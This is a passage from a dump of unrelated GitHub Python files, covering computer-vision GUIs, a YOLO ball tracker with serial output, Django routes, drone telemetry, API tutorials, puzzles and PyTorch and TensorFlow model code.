self.label=ttk.Label(self.frame,text=\"test\")\r\n self.label.bind(\"\",self.update)\r\n self.button=ttk.Button(self.frame,text=\"Exit\")\r\n self.button.bind(\"\",self.close)\r\n self.button.grid(row=3,column=0)\r\n self.label.grid(row=0,column=0)\r\n \r\n self.root.mainloop()\r\n \r\n '''\r\n This below function is to capture a image from webcam\r\n and convert it into a format that can be displayed on the \r\n window\r\n '''\r\n \r\n def update(self,event):\r\n self.cap=cv2.VideoCapture(0)\r\n ret,img_arr=self.cap.read()\r\n 
self.Image_proc=img_arr\r\n cv2.imwrite(\"test.png\", img_arr)\r\n load=Image.open(\"test.png\")\r\n img_disp=ImageTk.PhotoImage(load)\r\n \r\n self.label.configure(text=\"\",image=img_disp);\r\n self.label.image=img_disp\r\n #self.label.place(x=0,y=0)\r\n \r\n \r\n \r\n '''\r\n This below function is to trigger conversation into a binary \r\n image from the original colour and display it in the label\r\n \r\n '''\r\n \r\n \r\n def binary(self,event):\r\n gray = cv2.cvtColor(self.Image_proc,cv2.COLOR_BGR2GRAY)\r\n blur = cv2.GaussianBlur(gray,(5,5),0)\r\n ret,thresh1 = cv2.threshold(blur,70,255,self.set_bin_flag)\r\n cv2.imwrite(\"test.png\", thresh1)\r\n load=Image.open(\"test.png\")\r\n img_disp=ImageTk.PhotoImage(load)\r\n self.label.configure(image=img_disp)\r\n self.label.image=img_disp\r\n \r\n\r\n '''\r\n The below function is to switch between black and white \r\n whenever is necessary based on the background \r\n because if for some reason I can't control whether my hand \r\n is painted white or black it will be useful for getting output and\r\n demo\r\n '''\r\n def Switch_bin(self,event):\r\n \r\n if(self.bin_flag==1):\r\n self.set_bin_flag=cv2.THRESH_OTSU\r\n self.bin_flag=0\r\n elif self.bin_flag==0:\r\n self.set_bin_flag=cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU\r\n self.bin_flag=1\r\n \r\n \r\n \r\n \r\n def close(self,event):\r\n while(self.cap.isOpened()):\r\n self.cap.release()\r\n\r\n\r\n\r\n\r\n\r\n'''\r\nThis class below is to add convex hull and defects to image\r\n'''\r\n\r\nclass GUI_defect:\r\n def __init__(self):\r\n self.root=tkinter.Tk();\r\n self.frame=ttk.Frame(self.root,width=600,height=400).grid(columnspan=4,rowspan=4);\r\n #self.image_disp=tkinter.PhotoImage(\"test.png\")\r\n self.frame_2=ttk.Frame(self.root,width=300,height=200,relief=tkinter.RIDGE, borderwidth=2)\r\n self.Image_proc=None\r\n self.frame_2.grid(rowspan=3,columnspan=3)\r\n #Buttons for frame_2\r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Make Binary\")\r\n self.btn_Bin=ttk.Button(self.frame_2,text=\"Add convex hull \")\r\n \r\n\r\ndefect=GUI_defect()\r\n\r\n#The reason why it was showing that early error was \r\n#that after mainloop is started ,it will check for events\r\n#but i guess it must be builtin that to check if the loop is either\r\n#have not run or something like that,its not related to Tk() alone\r\n#so thats why I am going to try another approach\r\n\r\n\r\n","repo_name":"coolstar8836/Gesutre-recognition-tutorial-code","sub_path":"GUI_test.py","file_name":"GUI_test.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"362887073","text":"from ctypes import *\nimport random\nimport os\nimport cv2\nimport time\nimport darknet\nimport numpy as np\nimport argparse\nimport array\nimport serial\nfrom threading import Thread, enumerate\nfrom queue import Queue\nserial_name = '/dev/usbcam'\n\n\n\n#####################################\nTHRESHOLD=85 \nDEPTH_COEFFICIENT=0.09 \nX_BIAS=0 \nX_DEVIATION=15 \n#####################################\n\n\n\n\n\nclass RB(object):\n def __init__(self):\n self.classes = []\n self.scores = []\n self.boxes = np.array([])\n self.scores = []\n self.x = 0\n self.y = 0\n self.d = 0\n self.s = 0\n self.img =np.ones((3,3),dtype=np.uint8)\n self.cmd = 'b'\n self.can_be_sent = False\n self.fps = 0\n self.depth_coefficient=0\n self.select_threshold = 0\n self.windowname = 'find_ball'\n self.windowname_= \"setting\"\n self.x_bias=0\n self.x_deviation=0\n\ndef 
parser():\n parser = argparse.ArgumentParser(description=\"YOLO Object Detection\")\n parser.add_argument(\"--input\", type=str, default=2,\n help=\"video source. If empty, uses webcam 0 stream\")\n parser.add_argument(\"--out_filename\", type=str, default=\"\",\n help=\"inference video name. Not saved if empty\")\n parser.add_argument(\"--weights\", default=\"./model/yolov4-tiny_last4.weights\",\n help=\"yolo weights path\")\n parser.add_argument(\"--dont_show\", action='store_true',\n help=\"windown inference display. For headless systems\")\n parser.add_argument(\"--ext_output\", action='store_true',\n help=\"display bbox coordinates of detected objects\")\n parser.add_argument(\"--config_file\", default=\"./cfg/yolov4-tiny-ball.cfg\",\n help=\"path to config file\")\n parser.add_argument(\"--data_file\", default=\"./cfg/coco.data\",\n help=\"path to data file\")\n parser.add_argument(\"--thresh\", type=float, default=.85,\n help=\"remove detections with confidence below this value\")\n return parser.parse_args()\n\n\ndef str2int(video_path):\n \"\"\"\n argparse returns and string althout webcam uses int (0, 1 ...)\n Cast to int if needed\n \"\"\"\n try:\n return int(video_path)\n except ValueError:\n return video_path\n\n\ndef check_arguments_errors(args):\n assert 0 < args.thresh < 1, \"Threshold should be a float between zero and one (non-inclusive)\"\n if not os.path.exists(args.config_file):\n raise(ValueError(\"Invalid config path {}\".format(os.path.abspath(args.config_file))))\n if not os.path.exists(args.weights):\n raise(ValueError(\"Invalid weight path {}\".format(os.path.abspath(args.weights))))\n if not os.path.exists(args.data_file):\n raise(ValueError(\"Invalid data file path {}\".format(os.path.abspath(args.data_file))))\n if str2int(args.input) == str and not os.path.exists(args.input):\n raise(ValueError(\"Invalid video path {}\".format(os.path.abspath(args.input))))\n\n\ndef set_saved_video(input_video, output_video, size):\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n fps = int(input_video.get(cv2.CAP_PROP_FPS))\n video = cv2.VideoWriter(output_video, fourcc, fps, size)\n return video\n\n\ndef convert2relative(bbox):\n \"\"\"\n YOLO format use relative coordinates for annotation\n \"\"\"\n x, y, w, h = bbox\n _height = darknet_height\n _width = darknet_width\n return x/_width, y/_height, w/_width, h/_height\n\n\ndef convert2original(image, bbox):\n x, y, w, h = convert2relative(bbox)\n\n image_h, image_w, __ = image.shape\n\n orig_x = int(x * image_w)\n orig_y = int(y * image_h)\n orig_width = int(w * image_w)\n orig_height = int(h * image_h)\n\n bbox_converted = (orig_x, orig_y, orig_width, orig_height)\n\n return bbox_converted\n\n\ndef convert4cropping(image, bbox):\n x, y, w, h = convert2relative(bbox)\n\n image_h, image_w, __ = image.shape\n\n orig_left = int((x - w / 2.) * image_w)\n orig_right = int((x + w / 2.) * image_w)\n orig_top = int((y - h / 2.) * image_h)\n orig_bottom = int((y + h / 2.) 
* image_h)\n\n if (orig_left < 0): orig_left = 0\n if (orig_right > image_w - 1): orig_right = image_w - 1\n if (orig_top < 0): orig_top = 0\n if (orig_bottom > image_h - 1): orig_bottom = image_h - 1\n\n bbox_cropping = (orig_left, orig_top, orig_right, orig_bottom)\n\n return bbox_cropping\n\n\ndef video_capture(frame_queue, darknet_image_queue):\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame_resized = cv2.resize(frame_rgb, (darknet_width, darknet_height),\n interpolation=cv2.INTER_LINEAR)\n frame_queue.put(frame)\n img_for_detect = darknet.make_image(darknet_width, darknet_height, 3)\n darknet.copy_image_from_bytes(img_for_detect, frame_resized.tobytes())\n darknet_image_queue.put(img_for_detect)\n cap.release()\n\n\ndef inference(darknet_image_queue, detections_queue, fps_queue,rb):\n while cap.isOpened():\n darknet_image = darknet_image_queue.get()\n prev_time = time.time()\n detections = darknet.detect_image(network, class_names, darknet_image, thresh=rb.select_threshold/100)\n #print(detections,'detections')\n detections_queue.put(detections)\n fps = int(1/(time.time() - prev_time))\n fps_queue.put(fps)\n #print(\"FPS: {}\".format(fps))\n darknet.print_detections(detections, args.ext_output)\n darknet.free_image(darknet_image)\n cap.release()\n\n\ndef drawing(frame_queue, detections_queue, fps_queue,rb):\n def nothing(x):\n pass\n cv2.namedWindow(rb.windowname,0)\n cv2.namedWindow(rb.windowname_,0)\n cv2.createTrackbar('thresh',rb.windowname_,int(rb.select_threshold),100,nothing)\n cv2.createTrackbar('depth',rb.windowname_,50,100,nothing)\n cv2.createTrackbar('x-bias',rb.windowname_,50,100,nothing)\n cv2.createTrackbar('x-deviation',rb.windowname_,X_DEVIATION,100,nothing)\n def c_dis(cclass, r, f): \n if cclass == 1:\n d = 2460 * f / r \n elif cclass == 2:\n d = 2100 * f / r\n return d\n random.seed(3) # deterministic bbox colors\n video = set_saved_video(cap, args.out_filename, (darknet_width, darknet_height))\n while cap.isOpened():\n rb.depth_coefficient=cv2.getTrackbarPos('depth',rb.windowname_)/50*DEPTH_COEFFICIENT\n rb.select_threshold=cv2.getTrackbarPos('thresh',rb.windowname_)\n rb.x_bias=int(cv2.getTrackbarPos('x-bias',rb.windowname_)-50)+X_BIAS\n rb.x_deviation=cv2.getTrackbarPos('x-deviation',rb.windowname_)\n frame = frame_queue.get()\n frame=cv2.resize(frame,(1280,960))\n detections = detections_queue.get()\n fps = fps_queue.get()\n detections_adjusted = []\n if frame is not None:\n if rb.cmd == '5' or rb.cmd == 'b':\n label_detect=\"basketball\"\n bclass=1\n if rb.cmd == '6' or rb.cmd == 'v':\n label_detect=\"volleyball\" \n bclass=2\n detections=[n for n in detections if n[0]==label_detect]\n _detections=[]\n for a,b,x in detections:\n _detections.append(x[2]*x[2]+x[3]*x[3])\n try:\n detections=detections[_detections.index(max(_detections))]\n #print(_detections)\n except:\n pass\n #_detections=[(x[0]-x[2])*(x[0]-x[2])+(x[1]-x[3])*(x[1]-x[3]) for x in list(detections)[:,2]]\n #print(_detections,'dddddd')\n if(len(detections)):\n\n label, confidence, bbox = detections[0],detections[1],detections[2]\n \n bbox_adjusted = convert2original(frame, bbox)\n rb.x=512-int(512*bbox_adjusted[0]/frame.shape[1])+rb.x_bias\n rb.y=int(bbox_adjusted[1])\n rb.d = c_dis(bclass, bbox_adjusted[2]/frame.shape[1],rb.depth_coefficient)\n \n #print(bbox_adjusted,'origin')\n detections_adjusted.append((str(label), confidence, bbox_adjusted))\n s=\"s:\"+confidence\n else:\n s=\"s:NONE\" \n rb.x=0\n rb.y=0\n 
rb.d=0\n image = darknet.draw_boxes(detections_adjusted, frame, class_colors)\n if rb.cmd == '5':\n s1 = 'cmd:5 finding basketball'\n elif rb.cmd == '6':\n s1 = 'cmd:6 finding volleyball'\n elif rb.cmd == 'b':\n s1 = '1-3 basketball'\n elif rb.cmd == 'v':\n s1 = '4-6 volleyball'\n else:\n s1 = 'wrong cmd %s' %rb.cmd\n cv2.putText(image, s1,(20,50), cv2.FONT_HERSHEY_DUPLEX,2, (28,150,36), 2)\n cv2.putText(image,s,(500,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image,\"x:%d\"%rb.x,(20,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image,\"d:%d\"%rb.d,(220,150), cv2.FONT_HERSHEY_DUPLEX,2, (18,87,220), 2)\n cv2.putText(image, \"fps:%.1f\"%fps,(20,250), cv2.FONT_HERSHEY_DUPLEX,2, (254,67,101), 2)\n cv2.putText(image, \"thresh:%d f:%.2f bias:%d\"%(rb.select_threshold,rb.depth_coefficient,rb.x_bias),(20,350), cv2.FONT_HERSHEY_DUPLEX,2, (100,100,100), 2)\n cv2.resizeWindow(rb.windowname,800, 600) # 设置长和宽\n y_min=400\n cv2.line(image,(0,y_min),(image.shape[1],y_min),(0,0,255),2,8)\n cv2.line(image,(int(image.shape[1]/2)+rb.x_bias,0),(int(image.shape[1]/2+rb.x_bias),image.shape[0]),(0,0,255),2,8)\n if not args.dont_show:\n cv2.imshow(rb.windowname, image)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n if cv2.waitKey(fps) & 0xff == ord('q'):\n break\n if cv2.waitKey(fps) & 0xff == ord('v'):\n rb.cmd = 'v'\n if cv2.waitKey(fps) & 0xff == ord('b'):\n rb.cmd = 'b'\n cap.release()\n video.release()\n cv2.destroyAllWindows()\n\ndef serial_(rb):\n \n buf = array.array('B', [0] * 10)\n # 10个16进制数组 buf[0]-buf[4] 固定\n # buf[5] buf[6] x\n # buf[7]buf[8] d\n buf[0] = 0x40\n buf[1] = 0x5E\n buf[2] = 0x76\n buf[3] = 0x00\n buf[4] = 0x00\n\n\n\n ser = serial.Serial(serial_name,115200, timeout=0.5)\n\n def send_data(x, d):\n buf[5] = int(hex(x // 256),16)\n buf[6] = int(hex(x % 256),16)\n buf[7] = int(hex(d // 256),16)\n buf[8] = int(hex(d % 256),16)\n suma = 0\n for i in range(9):\n suma = suma + buf[i]\n buf[9] = (suma) & 0xff\n ser.write(buf)\n print(\"正在发送数据... 
波特率:%d\"%ser.baudrate)\n while 1:\n try:\n if ser.inWaiting() > 0:\n rb.cmd = ser.read(1).decode()\n time.sleep(0.1)\n if (rb.y > 400) & (rb.d < 4000):\n rb.can_be_sent = True\n else:\n rb.can_be_sent = False\n rb.x = change_rbx(rb,X_DEVIATION)\n if rb.can_be_sent:\n send_data(rb.x,int(rb.d))\n\n else:\n send_data(0,0)\n #print((rb.x,rb.y,rb.d,rb.can_be_sent))\n except serial.SerialException as e:\n # There is no new data from serial port\n print(\"串口断开..\")\n time.sleep(5)\n for i in range(10):\n ser = serial.Serial(serial_name,115200, timeout=1)\n\n\n except TypeError as e:\n\t\t# Disconnect of USB->UART occured\n return None\n else:\n continue\n \ndef check_ball_pos(rb,y_min=400,d_min = 2000):\n if (rb.y > y_min) & (rb.d < d_min):\n rb.can_be_sent = True\n else:\n rb.can_be_sent = False\n\ndef change_rbx(rb,x):\n if abs(rb.x-256) < x:\n return 256\n else:\n return rb.x\n\nif __name__ == '__main__':\n frame_queue = Queue()\n darknet_image_queue = Queue(maxsize=1)\n detections_queue = Queue(maxsize=1)\n fps_queue = Queue(maxsize=1)\n rb = RB()\n rb.select_threshold=THRESHOLD\n rb.depth_coefficient=DEPTH_COEFFICIENT\n rb.x_bias=X_BIAS\n args = parser()\n check_arguments_errors(args)\n network, class_names, class_colors = darknet.load_network(\n args.config_file,\n args.data_file,\n args.weights,\n batch_size=1\n )\n darknet_width = darknet.network_width(network)\n darknet_height = darknet.network_height(network)\n input_path = str2int(args.input)\n \n cap = cv2.VideoCapture(1)\n cap.set(3,640)\n cap.set(4,480)\n Thread(target=serial_,args=(rb,)).start()\n Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()\n Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue,rb)).start()\n Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue,rb)).start()\n","repo_name":"SHUStriveMotionTeam/VisionTeam_Yolo","sub_path":"darknet_video.py","file_name":"darknet_video.py","file_ext":"py","file_size_in_byte":13190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17530717238","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('ege/', views.ege, name='ege'),\n path('index/', views.index, name='index'),\n path('probls////', views.probls, name='probls'),\n path('task//', views.task, name='task'),\n path('theme//', views.theme, name='theme')\n]\n","repo_name":"mmt-48/ege","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33603674279","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx_data = np.random.rand(100).astype(np.float32)\ny_data = x_data*0.1 + 0.3\n\n\nWeights = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nbiases = tf.Variable(tf.zeros([1]))\ny = Weights*x_data + biases\n\n# biases_stop = tf.stop_gradient(biases)\n# y_stop = Weights*x_data + biases_stop\n\n# loss_stop = tf.reduce_mean(tf.square(y_stop-y_data))\nloss = tf.reduce_mean(tf.square(y-y_data))\n\noptimizer = tf.train.GradientDescentOptimizer(0.1)\n\ntrain = optimizer.minimize(loss)\n# train_stop = optimizer.minimize(loss_stop)\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\nfor step in range(1001):\n sess.run(train)\n\n # if step < 10:\n # sess.run(train)\n # else :\n # sess.run(train_stop)\n # if sess.run(loss_stop) > 0.05:\n # sess.run(train)\n if step % 20 == 0:\n print(step, sess.run(Weights), sess.run(biases), sess.run(loss))\n\n# draw\nWeights = sess.run(Weights)\nbiases = sess.run(biases)\ny = sess.run(y)\n\n# draw\nplt.plot(x_data, y_data, \"+\")\nplt.plot(x_data, y)\nplt.show()\n\n# gradients = optimizer.compute_gradients(loss)\n# print(sess.run(gradients))\n","repo_name":"overfitover/qapnet","sub_path":"work_logs/exams/number_predice.py","file_name":"number_predice.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14093139345","text":"import read_csv\nimport utils\nimport charts\n\ndef run():\n data = read_csv.read_csv('./world_population.csv')\n country = input('Ingrese el nombre del país de interés: ')\n info_pais = utils.data_by_country(data, country)\n print(info_pais)\n \n if len(info_pais) > 0:\n country = info_pais[0]\n labels, values = utils.population(country)\n charts.generate_bar_chart(labels, values)\n \nif __name__ == '__main__':\n run()","repo_name":"NestorSchneemann/world_population","sub_path":"crec_poblacional.py","file_name":"crec_poblacional.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22004663456","text":"from dronekit import connect, VehicleMode, LocationGlobalRelative, APIException\nimport time\nimport socket\nimport exceptions\nimport math\nimport argparse ## parse cmd args\n\n\n############# FUNCTIONS #############\n\n\n\n# Capable of launching and connecting to a virtual drone, or the real thing.\n# If sitlInstance = True, then connect to sitl, o/w connect to RPi + Pixhawk.\ndef connectToDrone(sitlInstance):\n\n if sitlInstance:\n vehicle = connect('udp:127.0.0.1:14550', wait_ready=True)\n else:\n vehicle = connect('/dev/ttyAMA0', baud = 57600, wait_ready = True)\n\n return vehicle\n# connectDrone()\n\n\n\n# prints useful attribute data representative of our vehicle's state\n# uses dronekit as an API to ardupilot to access most attributes\n# usage: $ python attribute_fetch.py\ndef 
fetchAndPrintAttributes(vehicle):\n\n # version and attributes\n vehicle.wait_ready('autopilot_version')\n print('Autopilot version: %s'%vehicle.version)\n\n # bool check if the firmware supports our on-board \n # computer for attitude setter capabilities\n print('Attitude set is supported: %s'%vehicle.capabilities.set_attitude_target_local_ned)\n\n # read the latitude, longitude, altitude, coords in the global frame\n print('Position: %s'%vehicle.location.global_relative_frame)\n\n # read attitude, roll, pitch, and yaw\n print('Attitude: %s'%vehicle.attitude)\n\n # read velocity (m/s) in NED coords\n print('Velocity: %s'%vehicle.velocity)\n\n # when was the last h.beat?\n print('Last heartbeat was: %s'%vehicle.last_heartbeat)\n\n # bool check the armable state\n print('Armable: %s'%vehicle.is_armable)\n\n # setter\n print('Groundspeed: %s'%vehicle.groundspeed)\n\n # print the flight mode\n print('Mode: %s'%vehicle.mode.name)\n\n # arm setter (returns 1 if props are spinning)\n print('Armed: %s'%vehicle.armed)\n\n # print the state estimation filter status\n print('Position: %s'%vehicle.ekf_ok)\n\n\n\n\n\n\n\n############# MAIN #############\n\n# flag to initialize sitl instance \n# (change to true for simulations)\n#initSitl = True\ninitSitl = False\n\n# connect to the drone\nvehicle = connectToDrone(initSitl)\n\n# print drone data\nfetchAndPrintAttributes(vehicle)\n\nvehicle.close()\n\n","repo_name":"5anperez/Robotics-UAV-PL","sub_path":"attribute_fetch.py","file_name":"attribute_fetch.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73854614812","text":"import requests\n\nbase_url = \"http://demo.codingnomads.co:8080/tasks_api/users\"\nrequest = requests.get(base_url)\n\ntype(request.content) # \n\n# query parameters \nparams_url = \"http://demo.codingnomads.co:8080/tasks_api/tasks?userId=1&complete=true\"\nreq2 = requests.get(params_url)\n\n# chk = request.content.decode('utf-8')\nchk = request.json()\ntype(chk) # dict()\n\nchk.keys()\nlen(chk)\n\n# query params 2\nparams_url2 = \"http://demo.codingnomads.co:8080/tasks_api/users\"\n\nparams = {\n \"email\": \"helmeczybruno32@gmail.com\"\n # \"email\": \"ryan@codingnomads.co\"\n}\n\nres = requests.get(params_url2, params = params)\n\nres.json()\n\n\n# Play around with codingnomads API ----\nimport pandas as pd\n\nbase_url = \"http://demo.codingnomads.co:8080/tasks_api\"\nusers = requests.get(base_url + '/users')\ndf = pd.DataFrame(users.json()['data'])\n\n\n","repo_name":"BrunoHelmeczy/Python_Studies","sub_path":"CodingNomads/Python_201/course_resources/07_apis/requests_101.py","file_name":"requests_101.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70882981852","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass Migration(migrations.Migration):\n def create_project_lock(apps, schema_editor):\n ProjectLock = apps.get_model(\"im\", \"ProjectLock\")\n try:\n ProjectLock.objects.get(id=1)\n except ObjectDoesNotExist:\n ProjectLock.objects.create(id=1)\n\n dependencies = [\n ('im', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(create_project_lock),\n 
]\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/migrations/0002_auto_projectlock.py","file_name":"0002_auto_projectlock.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"30147761337","text":"\"\"\"\r\n\n\nWrite a function that replaces every row and column that contains at least one\n**1** into a row/column that is filled **entirely** with **1s**.\n\nSolve this **without** returning a copy of the input list.\n\n### Examples\n\n ones_infection([\n [0, 0, 1],\n [0, 0, 0],\n [0, 0, 0]\n ]) ➞ [\n [1, 1, 1],\n [0, 0, 1],\n [0, 0, 1]\n ]\n \n ones_infection([\n [1, 0, 1, 0],\n [0, 1, 0, 0],\n [0, 0, 0, 0]\n ]) ➞ [\n [1, 1, 1, 1],\n [1, 1, 1, 1],\n [1, 1, 1, 0]\n ]\n \n ones_infection([\n [0, 1, 0, 1],\n [0, 0, 0, 0],\n [0, 1, 0, 0]\n ]) ➞ [\n [1, 1, 1, 1],\n [0, 1, 0, 1],\n [1, 1, 1, 1]\n ]\n\n### Notes\n\n * You must **mutate** the original matrix.\n * Input matrices will have at least row and one column.\n * **Bonus** : Solve this **without** using any higher-order functions.\n\n\"\"\"\r\n\ndef ones_infection(arr):\n copy = arr.copy()\n cols = []\n for r in range(len(arr)):\n for c in range(len(arr[0])):\n if copy[r][c] == 1:\n arr[r] = [1]*len(arr[r])\n cols.append(c)\n for col in cols:\n for r in range(len(arr)):\n arr[r][col] = 1\n return arr\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"tY5fmSbk85N8digXQ_3.py","file_name":"tY5fmSbk85N8digXQ_3.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30125300018","text":"t = int(input())\nfor case_num in range(t):\n n = int(input())\n a = list(map(int, input().split(' ')))\n swap = 0\n swapped = True\n while swap < n:\n swapped = False\n mi = -1\n m = n + 1\n for i in range(swap, n):\n if a[i] < m:\n m = a[i]\n mi = i\n b = a.copy()\n b[swap] = m\n for j in range(swap + 1, mi + 1):\n swapped = True\n b[j] = a[j - 1]\n swap = mi if swapped else swap + 1\n a = b\n print(' '.join(map(str, a)))\n","repo_name":"lucifer1004/codeforces","sub_path":"1256/b/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20811995289","text":"import io\nimport os\n\nimport cv2\nimport numpy as np\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.responses import FileResponse, PlainTextResponse\nfrom utils import classify_image\n\napp = FastAPI(\n title=\"AI Image Classification API\",\n description=\"\"\"An API for classifying Images into AI and Human\"\"\",\n)\n\n\n\n@app.get(\"/\", response_class=PlainTextResponse, tags=[\"home\"])\nasync def home():\n note = \"\"\"\n AI Image Detection API 🖼️\\nAn API for detecting AI Generated Images AI\\nNote: add \\\"/redoc\\\" to get the complete documentation.\n \"\"\"\n return note\n\n@app.post(\"/classify-image\")\nasync def get_image(file: UploadFile = File(...)):\n\n contents = io.BytesIO(await file.read())\n file_bytes = np.asarray(bytearray(contents.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n cv2.imwrite(\"images.jpg\", img)\n try:\n data = classify_image(\"images.jpg\")\n return data\n except ValueError as e:\n e = \"Error! 
Please upload a valid image type.\"\n return e","repo_name":"abdelrhmangit/id","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15303773843","text":"import time\n\n\ndef get_tick_rate(clock_func: callable) -> float:\n start_time = time.time()\n measurements = [clock_func() for _ in range(2_000_000)]\n end_time = time.time()\n\n ticks = 0\n prev_value = measurements[0]\n for current_value in measurements[1:]:\n if current_value < prev_value:\n raise RuntimeError(\"Clock function is not monotonic\")\n if current_value != prev_value:\n ticks += 1\n prev_value = current_value\n\n return ticks / (end_time - start_time) # ticks per second\n\n\nif __name__ == \"__main__\":\n clock_funcs = {\n \"time \": time.time,\n \"time_ns \": time.time_ns,\n \"monotonic \": time.monotonic,\n \"monotonic_ns \": time.monotonic_ns,\n \"perf_counter \": time.perf_counter,\n \"perf_counter_ns\": time.perf_counter_ns,\n }\n\n for name, func in clock_funcs.items():\n print(f\"Tick rate for {name}: {get_tick_rate(func) / 1_000_000.0:.3f}M ticks/second\")\n","repo_name":"mkrd/DictDataBase","sub_path":"tests/system_checks/test_tick_rate.py","file_name":"test_tick_rate.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"32"} +{"seq_id":"40813630259","text":"# individual network settings for each actor + critic pair\n# see networkforall for details\n\nfrom Networks import Critic,Actor\nfrom utilities import hard_update\nfrom torch.optim import Adam\nimport torch\nimport numpy as np\nfrom copy import deepcopy\n\n# add OU noise for exploration\nfrom OUNoise import OUNoise\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass DDPGAgent:\n def __init__(self, stateSize,actionSize, lr_actor=1.0e-3, lr_critic=1.0e-3):\n super(DDPGAgent, self).__init__()\n\n\n #initialize actor, target actor, critic and target critic for each agent\n self.actor = Actor(actionSize,stateSize).to(device)\n self.critic = Critic(actionSize,stateSize).to(device)\n self.target_actor = deepcopy(Actor(actionSize,stateSize)).to(device)\n self.target_critic = deepcopy(Critic(actionSize,stateSize)).to(device)\n\n #initialize OU noise\n self.noise = OUNoise(mu=np.zeros(actionSize), sigma=0.01)\n\n \n # initialize targets same as original networks\n hard_update(self.target_actor, self.actor)\n hard_update(self.target_critic, self.critic)\n\n #we choose adam as an optimizer for both actor and critic\n self.actor_optimizer = Adam(self.actor.parameters(), lr=lr_actor)\n self.critic_optimizer = Adam(self.critic.parameters(), lr=lr_critic)\n\n\n #compute action of the local actor by the current actor and add OU noise on top\n def act(self, obs, noise=0.0):\n self.actor.eval()\n action = self.actor(obs) + noise*torch.FloatTensor(self.noise()).to(device)\n self.actor.train()\n return action\n\n #compute action of the target actor by the current actor and add OU noise on top\n def target_act(self, obs, noise=0.0):\n action = self.target_actor(obs) + noise*torch.FloatTensor(self.noise()).to(device)\n return action\n","repo_name":"commanderka/udacity","sub_path":"project3_collab-compet/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25825066013","text":"from torch import 
nn\r\nclass Linear_mnist(nn.Module):\r\n def __init__(self,input_size =3 * 28 * 28, final_dim=100):\r\n super(Linear_mnist, self).__init__()\r\n hidden_dim = 100\r\n lin1 = nn.Linear(input_size, hidden_dim)\r\n self.imput_size = input_size\r\n lin2 = nn.Linear(hidden_dim, hidden_dim)\r\n lin3 = nn.Linear(hidden_dim, hidden_dim)\r\n lin4 = nn.Linear(hidden_dim, 10)\r\n lin_contra_f = nn.Linear(hidden_dim, final_dim)\r\n self.final_cls = lin4\r\n self._features = nn.Sequential(lin1, nn.ReLU(), lin2, nn.ReLU(), lin3, nn.ReLU())\r\n self.final_contra_cls_f = lin_contra_f\r\n def forward(self, input_imgs, need_features = False):\r\n input_imgs = input_imgs.permute(0, 3, 1, 2).contiguous().view(-1,self.imput_size)\r\n features = self._features(input_imgs)\r\n out = self.final_cls(features)\r\n if need_features:\r\n return features, out\r\n return out\r\n def get_features_contra(self, input_imgs):\r\n input_imgs = input_imgs.permute(0,3,1,2).contiguous().view(-1,self.imput_size)\r\n features = self._features(input_imgs)\r\n features = self.final_contra_cls_f(features)\r\n return features\r\n\r\nclass CNN_cifar(nn.Module):\r\n def __init__(self,args=None,input_channel = 3, hidden_channel = 32,further_cls = False):\r\n super(CNN_cifar, self).__init__()\r\n conv1 = nn.Conv2d(input_channel, 